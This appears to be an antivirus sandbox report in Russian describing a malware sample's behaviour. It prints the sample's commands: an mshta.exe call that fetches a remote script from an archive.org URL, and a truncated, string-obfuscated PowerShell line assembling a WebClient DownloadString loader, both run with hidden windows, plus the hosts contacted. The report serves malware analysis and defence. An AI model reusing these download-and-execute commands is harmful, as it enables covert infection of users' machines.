Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' https://ia601407.us.archive.org/22/items/encoding_20210413_1137/Encoding.txt
Сетевая активность
Подключается к
- 'ia#####7.us.archive.org':443
- 'cr#.#odaddy.com':80
TCP
- 'ia#####7.us.archive.org':443
UDP
- DNS ASK ia#####7.us.archive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK st####.rapidssl.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' https://ia601407.us.archive.org/22/items/encoding_20210413_1137/Encoding.txt' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$...
